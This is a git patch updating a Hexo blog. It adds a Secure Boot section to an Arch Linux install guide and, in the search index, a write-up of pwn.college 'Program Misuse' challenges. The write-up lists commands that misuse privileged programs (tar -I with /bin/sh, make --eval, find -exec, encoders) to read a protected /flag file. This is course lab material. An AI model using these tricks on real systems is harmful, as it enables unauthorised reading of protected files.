From b034b4a0311a8a1061877b9e3efb0c07b37cfa95 Mon Sep 17 00:00:00 2001
From: starlitxiling <1754165401@qq.com>
Date: Wed, 24 Jul 2024 18:39:18 +0800
Subject: [PATCH] Site updated: 2024-07-24 18:39:18

---
 2023/09/24/ProgramMisuse/index.html |   4 +-
 2023/10/26/Interaction/index.html   |   4 +-
 2023/11/10/AssembleCrash/index.html |   4 +-
 2024/07/12/Install/index.html       |  17 +-
 2024/07/16/error/index.html         |   4 +-
 2024/07/17/time/index.html          |   4 +-
 404.html                            |   2 +-
 archives/2023/09/index.html         |   2 +-
 archives/2023/10/index.html         |   2 +-
 archives/2023/11/index.html         |   2 +-
 archives/2023/index.html            |   2 +-
 archives/2024/07/index.html         |   2 +-
 archives/2024/index.html            |   2 +-
 archives/index.html                 |   2 +-
 essays/index.html                   |   4 +-
 index.html                          |   2 +-
 links/index.html                    |   4 +-
 masonry/index.html                  |   4 +-
 search.xml                          | 303 ++++++++++++++--------------
 tags/index.html                     |   4 +-
 tags/pwn/index.html                 |   2 +-
 21 files changed, 189 insertions(+), 187 deletions(-)

diff --git a/2023/09/24/ProgramMisuse/index.html b/2023/09/24/ProgramMisuse/index.html
index 03b8466..f4654cf 100644
--- a/2023/09/24/ProgramMisuse/index.html
+++ b/2023/09/24/ProgramMisuse/index.html
@@ -30,7 +30,7 @@
 <meta property="og:description" content="这里记录的是ASU 466课程的解题记录,pwn ,这一小节的题目只要学会看man page就能写出来。 11cat &#x2F;flag   21more &#x2F;flag  31less &#x2F;flag  41tail &#x2F;flag  51head &#x2F;flag   61sort &#x2F;flag  71vim &#x2F;flag  81emacs &#x2F;flag  91nano &#x2F;flag  101rev &#x2F;flag | rev">
 <meta property="og:locale" content="en_US">
 <meta property="article:published_time" content="2023-09-23T23:40:58.000Z">
-<meta property="article:modified_time" content="2024-07-18T06:32:19.324Z">
+<meta property="article:modified_time" content="2024-07-18T06:32:19.000Z">
 <meta property="article:author" content="John Doe">
 <meta property="article:tag" content="pwn">
 <meta name="twitter:card" content="summary">
@@ -953,7 +953,7 @@ <h3 id="51"><a href="#51" class="headerlink" title="51"></a>51</h3><p><a class="
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/2023/10/26/Interaction/index.html b/2023/10/26/Interaction/index.html
index ce3ac28..d9fafab 100644
--- a/2023/10/26/Interaction/index.html
+++ b/2023/10/26/Interaction/index.html
@@ -42,7 +42,7 @@
 <meta property="og:image" content="http://example.com/images/pwncollege/Pasted%20image%2020231022101625.png">
 <meta property="og:image" content="http://example.com/images/pwncollege/Pasted%20image%2020231022181829.png">
 <meta property="article:published_time" content="2023-10-26T15:05:31.000Z">
-<meta property="article:modified_time" content="2024-07-18T06:31:13.567Z">
+<meta property="article:modified_time" content="2024-07-18T06:31:13.000Z">
 <meta property="article:author" content="John Doe">
 <meta property="article:tag" content="pwn">
 <meta name="twitter:card" content="summary">
@@ -1298,7 +1298,7 @@ <h3 id="142"><a href="#142" class="headerlink" title="142"></a>142</h3><p><img
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/2023/11/10/AssembleCrash/index.html b/2023/11/10/AssembleCrash/index.html
index d41295a..ece6d51 100644
--- a/2023/11/10/AssembleCrash/index.html
+++ b/2023/11/10/AssembleCrash/index.html
@@ -53,7 +53,7 @@
 <meta property="og:image" content="http://example.com/images/pwncollege/Pasted%20image%2020231223095202.png">
 <meta property="og:image" content="http://example.com/images/pwncollege/Pasted%20image%2020231223165553.png">
 <meta property="article:published_time" content="2023-11-10T11:20:02.000Z">
-<meta property="article:modified_time" content="2024-07-19T02:23:54.189Z">
+<meta property="article:modified_time" content="2024-07-19T02:23:54.000Z">
 <meta property="article:author" content="John Doe">
 <meta name="twitter:card" content="summary">
 <meta name="twitter:image" content="http://example.com/images/pwncollege/Pasted%20image%2020231127183017.png">
@@ -1073,7 +1073,7 @@ <h3 id="30"><a href="#30" class="headerlink" title="30"></a>30</h3><p><img
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/2024/07/12/Install/index.html b/2024/07/12/Install/index.html
index 85b1892..17fb7ac 100644
--- a/2024/07/12/Install/index.html
+++ b/2024/07/12/Install/index.html
@@ -30,7 +30,7 @@
 <meta property="og:description" content="原电脑为单硬盘Windows，安装Archlinux之后是单硬盘双系统，efi分区为260MB(可以在Windows下使用diskgenius查看)说在前面的话在安装之前，建先阅读一下archlinux真的适合我吗  安装流程这里参考新手上路 和Archlinux wiki  这里要补充一点的是在进入boot之后检查一下自己的SATA Mode，如果是RAID，则会导致你在安装archlinux的">
 <meta property="og:locale" content="en_US">
 <meta property="article:published_time" content="2024-07-12T06:32:50.000Z">
-<meta property="article:modified_time" content="2024-07-17T13:14:18.815Z">
+<meta property="article:modified_time" content="2024-07-24T10:38:44.532Z">
 <meta property="article:author" content="John Doe">
 <meta name="twitter:card" content="summary">
     
@@ -603,8 +603,8 @@ <h1 class="article-title-regular text-second-text-color tracking-tight text-4xl
     
         <span class="article-date article-meta-item">
             <i class="fa-regular fa-wrench"></i>&nbsp;
-            <span class="desktop">2024-07-17 21:14:18</span>
-            <span class="mobile">2024-07-17 21:14:18</span>
+            <span class="desktop">2024-07-24 18:38:44</span>
+            <span class="mobile">2024-07-24 18:38:44</span>
             <span class="hover-info">Updated</span>
         </span>
     
@@ -615,7 +615,7 @@ <h1 class="article-title-regular text-second-text-color tracking-tight text-4xl
     
     
         <span class="article-wordcount article-meta-item">
-            <i class="fa-regular fa-typewriter"></i>&nbsp;<span>439 Words</span>
+            <i class="fa-regular fa-typewriter"></i>&nbsp;<span>533 Words</span>
         </span>
     
     
@@ -657,7 +657,8 @@ <h1 id="修改硬盘启动顺序"><a href="#修改硬盘启动顺序" class="hea
 <div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo efibootmgr -o 0001,0000,0002</span><br></pre></td></tr></table></figure></div>
 <p>(这里的0001数字是你希望作为默认启动硬盘的BootNum，如果是其他的就换成其他的BootNum)<br><br></p>
 <p>如果你想详细了解<code>RAID</code>和<code>AHCI</code>，你可以参阅以下资料：<br><a class="link"   target="_blank" rel="noopener" href="https://wiki.archlinuxcn.org/wiki/RAID" >RAID <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a><br><a class="link"   target="_blank" rel="noopener" href="https://wiki.archlinuxcn.org/wiki/AHCI" >AHCI <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a><br><a class="link"   target="_blank" rel="noopener" href="https://www.cnblogs.com/FireLife-Cheng/p/16408674.html" >https://www.cnblogs.com/FireLife-Cheng/p/16408674.html <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
-<p>如果想装nixos，可以参考<a class="link"   target="_blank" rel="noopener" href="https://jackyliu16.github.io/blog/2023/dual-system-in-an515-54/" >https://jackyliu16.github.io/blog/2023/dual-system-in-an515-54/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
+<h1 id="安全启动"><a href="#安全启动" class="headerlink" title="安全启动"></a>安全启动</h1><p>如果你想为ArchLinux设置安全启动，你可以参考官方文档<a class="link"   target="_blank" rel="noopener" href="https://wiki.archlinuxcn.org/wiki/UEFI/%E5%AE%89%E5%85%A8%E5%90%AF%E5%8A%A8" >安全启动 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>. 强烈建议先把官方文档读一遍！！!这里要注意的点是选择哪个方式，如果你的bios有<code>setup mode</code>,你可以参考<a class="link"   target="_blank" rel="noopener" href="https://www.reddit.com/r/archlinux/comments/10pq74e/my_easy_method_for_setting_up_secure_boot_with/" >easy_method <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>,如果没有，那你需要将密钥写进bios中，可以参考<a class="link"   target="_blank" rel="noopener" href="https://cascade.moe/posts/secure-boot/" >密钥安全启动 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>.</p>
+<p>如果想装nixos，可以参考<a class="link"   target="_blank" rel="noopener" href="https://jackyliu16.github.io/blog/2023/dual-system-in-an515-54/" >https://jackyliu16.github.io/blog/2023/dual-system-in-an515-54/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>   </p>
 
         </div>
 
@@ -672,7 +673,7 @@ <h1 id="修改硬盘启动顺序"><a href="#修改硬盘启动顺序" class="hea
         
             <li>
                 <strong>Updated at
-                    :</strong> 2024-07-17 21:14:18
+                    :</strong> 2024-07-24 18:38:44
             </li>
         
         <li>
@@ -788,7 +789,7 @@ <h1 id="修改硬盘启动顺序"><a href="#修改硬盘启动顺序" class="hea
     <div class="post-toc">
         <div class="toc-title">On this page</div>
         <div class="page-title">Archlinux Install</div>
-        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%AF%B4%E5%9C%A8%E5%89%8D%E9%9D%A2%E7%9A%84%E8%AF%9D"><span class="nav-text">说在前面的话</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%89%E8%A3%85%E6%B5%81%E7%A8%8B"><span class="nav-text">安装流程</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BF%AE%E6%94%B9%E7%A1%AC%E7%9B%98%E5%90%AF%E5%8A%A8%E9%A1%BA%E5%BA%8F"><span class="nav-text">修改硬盘启动顺序</span></a></li></ol>
+        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%AF%B4%E5%9C%A8%E5%89%8D%E9%9D%A2%E7%9A%84%E8%AF%9D"><span class="nav-text">说在前面的话</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%89%E8%A3%85%E6%B5%81%E7%A8%8B"><span class="nav-text">安装流程</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BF%AE%E6%94%B9%E7%A1%AC%E7%9B%98%E5%90%AF%E5%8A%A8%E9%A1%BA%E5%BA%8F"><span class="nav-text">修改硬盘启动顺序</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%89%E5%85%A8%E5%90%AF%E5%8A%A8"><span class="nav-text">安全启动</span></a></li></ol>
 
     </div>
 </div>
@@ -825,7 +826,7 @@ <h1 id="修改硬盘启动顺序"><a href="#修改硬盘启动顺序" class="hea
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/2024/07/16/error/index.html b/2024/07/16/error/index.html
index 76838e2..ff8752a 100644
--- a/2024/07/16/error/index.html
+++ b/2024/07/16/error/index.html
@@ -30,7 +30,7 @@
 <meta property="og:description" content="记录一次git push大仓库的问题，背景是一个在本地的仓库推送到一个新仓库中(包括所有的历史提交记录)git error: failed to push some refs to remote这个问题是本地和远程会产生冲突，因为远程是新仓库，和本地仓库并没有联系，所以这里可以直接git pull &lt;repository&gt; &lt;branch&gt; --allow-unrelate">
 <meta property="og:locale" content="en_US">
 <meta property="article:published_time" content="2024-07-16T01:55:41.000Z">
-<meta property="article:modified_time" content="2024-07-17T13:14:18.815Z">
+<meta property="article:modified_time" content="2024-07-17T13:14:18.000Z">
 <meta property="article:author" content="John Doe">
 <meta name="twitter:card" content="summary">
     
@@ -813,7 +813,7 @@ <h2 id="git功能"><a href="#git功能" class="headerlink" title="git功能"></a
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/2024/07/17/time/index.html b/2024/07/17/time/index.html
index 560ea8c..1891f6c 100644
--- a/2024/07/17/time/index.html
+++ b/2024/07/17/time/index.html
@@ -30,7 +30,7 @@
 <meta property="og:description" content="NTP(Network Time Protocol)是一种广泛使用的时间同步协议，旨在通过网络将计算机时钟同步到UTC(Coordinated Universal Time),目的是为了解决不同系统之间时间一致性的问题，可以看一下这个典型的时钟同步算法 工作原理：  时间交换：NTP客户端向一个或多个NTP服务器发送时间请求，服务器回应当前的时间。客户端接收到多个服务器的时间后，会计算出最准确的时">
 <meta property="og:locale" content="en_US">
 <meta property="article:published_time" content="2024-07-17T07:14:53.000Z">
-<meta property="article:modified_time" content="2024-07-17T13:14:18.815Z">
+<meta property="article:modified_time" content="2024-07-17T13:14:18.000Z">
 <meta property="article:author" content="John Doe">
 <meta name="twitter:card" content="summary">
     
@@ -824,7 +824,7 @@ <h1 class="article-title-regular text-second-text-color tracking-tight text-4xl
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/404.html b/404.html
index 4d21bc2..3027507 100644
--- a/404.html
+++ b/404.html
@@ -601,7 +601,7 @@ <h1>404 Page Not Found</h1>
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/archives/2023/09/index.html b/archives/2023/09/index.html
index f81506a..2001dd0 100644
--- a/archives/2023/09/index.html
+++ b/archives/2023/09/index.html
@@ -692,7 +692,7 @@ <h2 class="ml13">
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/archives/2023/10/index.html b/archives/2023/10/index.html
index 636eccc..93c29c0 100644
--- a/archives/2023/10/index.html
+++ b/archives/2023/10/index.html
@@ -692,7 +692,7 @@ <h2 class="ml13">
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/archives/2023/11/index.html b/archives/2023/11/index.html
index 36dbc3c..6675fc3 100644
--- a/archives/2023/11/index.html
+++ b/archives/2023/11/index.html
@@ -692,7 +692,7 @@ <h2 class="ml13">
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/archives/2023/index.html b/archives/2023/index.html
index 3eb5801..b75b8fe 100644
--- a/archives/2023/index.html
+++ b/archives/2023/index.html
@@ -692,7 +692,7 @@ <h2 class="ml13">
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/archives/2024/07/index.html b/archives/2024/07/index.html
index 47b92b6..26f9304 100644
--- a/archives/2024/07/index.html
+++ b/archives/2024/07/index.html
@@ -692,7 +692,7 @@ <h2 class="ml13">
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/archives/2024/index.html b/archives/2024/index.html
index 9ad5461..c68ca2e 100644
--- a/archives/2024/index.html
+++ b/archives/2024/index.html
@@ -692,7 +692,7 @@ <h2 class="ml13">
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/archives/index.html b/archives/index.html
index 5c2f289..0bb2fac 100644
--- a/archives/index.html
+++ b/archives/index.html
@@ -692,7 +692,7 @@ <h2 class="ml13">
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/essays/index.html b/essays/index.html
index 55d478a..3281f28 100644
--- a/essays/index.html
+++ b/essays/index.html
@@ -28,7 +28,7 @@
 <meta property="og:site_name" content="Hexo">
 <meta property="og:locale" content="en_US">
 <meta property="article:published_time" content="2024-07-18T05:51:40.000Z">
-<meta property="article:modified_time" content="2024-07-18T06:43:11.554Z">
+<meta property="article:modified_time" content="2024-07-18T06:43:11.000Z">
 <meta property="article:author" content="John Doe">
 <meta name="twitter:card" content="summary">
     
@@ -609,7 +609,7 @@ <h1>Essays</h1>
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/index.html b/index.html
index 47d2471..fb13af4 100644
--- a/index.html
+++ b/index.html
@@ -996,7 +996,7 @@ <h3 class="home-article-title">
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/links/index.html b/links/index.html
index c86446c..5ddda84 100644
--- a/links/index.html
+++ b/links/index.html
@@ -28,7 +28,7 @@
 <meta property="og:site_name" content="Hexo">
 <meta property="og:locale" content="en_US">
 <meta property="article:published_time" content="2024-07-19T06:00:20.000Z">
-<meta property="article:modified_time" content="2024-07-19T07:28:13.547Z">
+<meta property="article:modified_time" content="2024-07-19T07:28:13.000Z">
 <meta property="article:author" content="John Doe">
 <meta name="twitter:card" content="summary">
     
@@ -644,7 +644,7 @@ <h2 class="text-2xl font-bold">Normal</h2>
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/masonry/index.html b/masonry/index.html
index c89a00e..6d1e5ac 100644
--- a/masonry/index.html
+++ b/masonry/index.html
@@ -28,7 +28,7 @@
 <meta property="og:site_name" content="Hexo">
 <meta property="og:locale" content="en_US">
 <meta property="article:published_time" content="2024-03-30T08:55:05.000Z">
-<meta property="article:modified_time" content="2024-07-17T13:14:18.815Z">
+<meta property="article:modified_time" content="2024-07-17T13:14:18.000Z">
 <meta property="article:author" content="John Doe">
 <meta name="twitter:card" content="summary">
     
@@ -691,7 +691,7 @@ <h1 class="page-title-header">masonry</h1>
                     </span>
                     
                         <span>
-                            15.3k words in total
+                            15.4k words in total
                         </span>
                     
                 </p>
diff --git a/search.xml b/search.xml
index e6117ff..3262430 100644
--- a/search.xml
+++ b/search.xml
@@ -269,9 +269,160 @@
 <div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">sudo efibootmgr -o 0001,0000,0002</span><br></pre></td></tr></table></figure></div>
 <p>(这里的0001数字是你希望作为默认启动硬盘的BootNum，如果是其他的就换成其他的BootNum)<br><br></p>
 <p>如果你想详细了解<code>RAID</code>和<code>AHCI</code>，你可以参阅以下资料：<br><a class="link"   href="https://wiki.archlinuxcn.org/wiki/RAID" >RAID <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a><br><a class="link"   href="https://wiki.archlinuxcn.org/wiki/AHCI" >AHCI <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a><br><a class="link"   href="https://www.cnblogs.com/FireLife-Cheng/p/16408674.html" >https://www.cnblogs.com/FireLife-Cheng/p/16408674.html <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
-<p>如果想装nixos，可以参考<a class="link"   href="https://jackyliu16.github.io/blog/2023/dual-system-in-an515-54/" >https://jackyliu16.github.io/blog/2023/dual-system-in-an515-54/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
+<h1 id="安全启动"><a href="#安全启动" class="headerlink" title="安全启动"></a>安全启动</h1><p>如果你想为ArchLinux设置安全启动，你可以参考官方文档<a class="link"   href="https://wiki.archlinuxcn.org/wiki/UEFI/%E5%AE%89%E5%85%A8%E5%90%AF%E5%8A%A8" >安全启动 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>. 强烈建议先把官方文档读一遍！！!这里要注意的点是选择哪个方式，如果你的bios有<code>setup mode</code>,你可以参考<a class="link"   href="https://www.reddit.com/r/archlinux/comments/10pq74e/my_easy_method_for_setting_up_secure_boot_with/" >easy_method <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>,如果没有，那你需要将密钥写进bios中，可以参考<a class="link"   href="https://cascade.moe/posts/secure-boot/" >密钥安全启动 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>.</p>
+<p>如果想装nixos，可以参考<a class="link"   href="https://jackyliu16.github.io/blog/2023/dual-system-in-an515-54/" >https://jackyliu16.github.io/blog/2023/dual-system-in-an515-54/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>   </p>
 ]]></content>
   </entry>
+  <entry>
+    <title>Program Misuse</title>
+    <url>/2023/09/24/ProgramMisuse/</url>
+    <content><![CDATA[<p>这里记录的是ASU 466课程的解题记录,<a class="link"   href="https://pwn.college/" >pwn <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>,这一小节的题目只要学会看<code>man page</code>就能写出来。</p>
+<h3 id="1"><a href="#1" class="headerlink" title="1"></a>1</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
+
+
+<h3 id="2"><a href="#2" class="headerlink" title="2"></a>2</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">more /flag</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="3"><a href="#3" class="headerlink" title="3"></a>3</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">less /flag</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="4"><a href="#4" class="headerlink" title="4"></a>4</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">tail</span> /flag</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="5"><a href="#5" class="headerlink" title="5"></a>5</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">head</span> /flag</span><br></pre></td></tr></table></figure></div>
+
+
+<h3 id="6"><a href="#6" class="headerlink" title="6"></a>6</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">sort</span> /flag</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="7"><a href="#7" class="headerlink" title="7"></a>7</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">vim /flag</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="8"><a href="#8" class="headerlink" title="8"></a>8</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">emacs /flag</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="9"><a href="#9" class="headerlink" title="9"></a>9</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">nano /flag</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="10"><a href="#10" class="headerlink" title="10"></a>10</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">rev /flag | rev</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="11"><a href="#11" class="headerlink" title="11"></a>11</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">od</span> -w100 -c /flag | sed <span class="string">&#x27;s# ##g&#x27;</span></span><br></pre></td></tr></table></figure></div>
+
+<h3 id="12"><a href="#12" class="headerlink" title="12"></a>12</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">hd -f /flag</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="13"><a href="#13" class="headerlink" title="13"></a>13</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">xxd /flag</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="14"><a href="#14" class="headerlink" title="14"></a>14</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">base32</span> /flag | <span class="built_in">base32</span> -d</span><br></pre></td></tr></table></figure></div>
+<p>注意这里不能直接<code>base32 -d /flag</code>，因为<code>-d</code>参数要有东西才能解码，所以要先用<code>base32</code>把<code>/flag</code>读出来</p>
+<h3 id="15"><a href="#15" class="headerlink" title="15"></a>15</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">base64</span> /flag | <span class="built_in">base64</span> -d</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="16"><a href="#16" class="headerlink" title="16"></a>16</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">split</span> /flag</span><br><span class="line"><span class="built_in">cat</span> xaa</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="17"><a href="#17" class="headerlink" title="17"></a>17</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">gzip -c /flag | gzip -d</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="18"><a href="#18" class="headerlink" title="18"></a>18</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">bzip2 -c /flag | bzip2 -d</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="19"><a href="#19" class="headerlink" title="19"></a>19</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">zip -r /flag.zip /flag</span><br><span class="line">unzip -p /flag</span><br></pre></td></tr></table></figure></div>
+<p>这里要注意<code>zip</code>命令的顺序，是被压缩后的名字在前，要压缩的文件在后，要加上<code>-r</code>参数</p>
+<h3 id="20"><a href="#20" class="headerlink" title="20"></a>20</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">tar -cvf flag.tar /flag</span><br><span class="line">tar xf flag.tar -O</span><br></pre></td></tr></table></figure></div>
+<p>or</p>
+<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">tar xf /flag -I <span class="string">&#x27;/bin/sh -c &quot;cat 1&gt;&amp;2&quot;&#x27;</span></span><br></pre></td></tr></table></figure></div>
+<p>第一个是延续压缩+解压的思路，下面是在网上看到的，利用<code>-I</code>参数执行额外程序的方法获得<code>flag</code></p>
+<h3 id="21"><a href="#21" class="headerlink" title="21"></a>21</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">ar -q flag.ar /flag</span><br><span class="line"><span class="built_in">cat</span> flag.ar</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="22"><a href="#22" class="headerlink" title="22"></a>22</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&quot;/flag&quot;</span> | cpio -o &gt; flag.cpio</span><br><span class="line"><span class="built_in">cat</span> flag.cpio</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="23"><a href="#23" class="headerlink" title="23"></a>23</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">genisoimage -<span class="built_in">sort</span> /flag</span><br></pre></td></tr></table></figure></div>
+
+<h3 id="24"><a href="#24" class="headerlink" title="24"></a>24</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">env</span> <span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
+
+
+<h3 id="25"><a href="#25" class="headerlink" title="25"></a>25</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">find . -<span class="built_in">exec</span> <span class="built_in">cat</span> /flag \; -quit</span><br></pre></td></tr></table></figure></div>
+<p>这里后面不加<code>quit</code>会一直<code>find</code></p>
+<h3 id="26"><a href="#26" class="headerlink" title="26"></a>26</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">vim Makefile</span><br><span class="line">    run:</span><br><span class="line">        <span class="built_in">cat</span> /flag</span><br><span class="line"></span><br><span class="line">make run</span><br></pre></td></tr></table></figure></div>
+<p>or</p>
+<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line">COMMAND=<span class="string">&#x27;cat /flag&#x27;</span>;make -s --<span class="built_in">eval</span>=$<span class="string">&#x27;x:\n\t-&#x27;</span><span class="string">&quot;<span class="variable">$COMMAND</span>&quot;</span></span><br></pre></td></tr></table></figure></div>
+<p><code>-s</code>选项告诉<code>make</code>以静默模式运行，也就是不输出详细的构建信息，只显示关键信息。<br><code>--eval=$&#39;x:\n\t-&#39;&quot;$COMMAND&quot;</code>:<code>--eval</code>用于在执行<code>make</code>时求值指定的表达式；<code>$&#39;x:\n\t-&#39;&quot;COMMAND&quot;</code>是一个将表达式传递给<code>make</code>的字符串<br><code>-x</code>是一个<code>Makefile</code>规则，它指定了一个名为<code>x</code>的目标。在这个例子中，<code>x</code>是目标的名字，后面的冒号表示这是一个伪目标。<br><code>\n\t-</code>是一个转义字符序列，表示一个换行符和一个制表符。这是<code>Makefile</code>语法中规定的，用于表示命令行的缩进。<br><code>&quot;$COMMAND&quot;</code>会被展开为前面定义的<code>COMMAND</code>变量的值 ，也就是<code>cat /flag</code>。这将作为<code>x</code>目标的执行命令。</p>
+<h3 id="27"><a href="#27" class="headerlink" title="27"></a>27</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">nice</span> <span class="built_in">cat</span> /flag</span><br></pre></td></tr></table></figure></div>
+
+
+<h3 id="28"><a href="#28" class="headerlink" title="28"></a>28</h3><div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">timeout</span> 7d <span class="built_in">cat</span> /flag</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>
+
+
